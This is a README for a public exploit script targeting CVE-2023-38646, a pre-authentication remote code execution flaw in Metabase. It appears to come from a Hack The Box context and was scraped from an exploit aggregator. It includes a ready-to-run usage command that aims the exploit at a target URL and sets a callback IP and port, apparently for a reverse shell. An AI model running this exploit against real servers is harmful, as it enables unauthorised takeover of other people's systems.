Share
## https://sploitus.com/exploit?id=745D9DB9-6119-5304-92E2-254190159067
# CVE-2023-38646

**Fork of [kh4sh3i's](https://github.com/kh4sh3i/CVE-2023-38646/tree/main) removing the need for Burp Collector.**

[CVE-2023-38646](https://nvd.nist.gov/vuln/detail/CVE-2023-38646) (Pre-Auth RCE in Metabase):
> Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation.

## Usage
`python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555`

For more info read this [post](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/).

## Credits
[@fay4breakme](https://app.hackthebox.com/profile/1642382)

[@kh4sh3i](https://github.com/kh4sh3i)

[@alex4breakme](https://app.hackthebox.com/profile/1546865)